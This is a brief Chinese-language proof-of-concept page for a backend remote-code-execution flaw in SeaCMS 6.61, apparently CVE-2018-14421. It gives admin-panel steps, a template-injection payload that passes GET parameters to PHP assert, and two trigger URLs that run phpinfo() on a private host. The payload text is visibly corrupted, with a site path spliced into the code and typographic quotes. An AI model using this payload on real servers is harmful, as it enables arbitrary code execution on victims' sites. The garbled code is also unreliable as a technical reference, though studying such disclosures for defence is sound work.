## Affected Version 6.61
## POC
后台的–>添加影片–> 图片地址–>payload
`{if:1)$GLOBALS[‘_G’.’ET’][a](/static/baige/01-CMS漏洞/seacms/$GLOBALS[‘_G’.’ET’][b]);//}{end if}`
访问
`http://192.168.0.6/seacms661/detail/?1.html&a=assert&b=phpinfo();`
`http://192.168.0.6/seacms661/search.php?searchtype=5&tid=0&a=assert&b=phpinfo();`
## References
[seacms backend getshell](/static/baige/01-CMS漏洞/seacms/http://hexo.imagemlt.xyz/post/seacms-backend-getshell/index.html)
[CVE-2018-14421——Seacms后台getshell分析](/static/baige/01-CMS漏洞/seacms/https://www.anquanke.com/post/id/152764)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容